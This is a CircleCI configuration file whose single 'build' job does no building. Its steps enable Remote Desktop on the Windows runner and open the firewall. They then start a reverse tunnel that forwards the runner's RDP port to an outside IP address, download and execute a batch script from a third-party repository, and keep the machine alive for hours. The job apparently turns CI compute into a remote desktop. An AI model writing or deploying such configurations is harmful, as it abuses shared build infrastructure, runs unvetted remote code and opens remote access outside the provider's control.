version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
    steps:
      - run:
          name: "Step1"
          command: |
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
            Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
            
      - run:
          name: "Step2"
          command: |
            python --version
            git clone https://github.com/aploium/shootback
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/blob/master/shootback.bat -OutFile shootback.bat
            # Start-Process "cmd.exe" shootback.bat
            Start-Process Powershell -ArgumentList '-Noexit -Command "python shootback\slaver.py -m 162.0.238.254:35012 -t 127.0.0.1:3389"'

      - run:
          name: "Step3"
          command: |
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/start2.sh -OutFile start.bat
            cmd /c start.bat
            Start-Sleep -s 99999
          no_output_timeout: 10h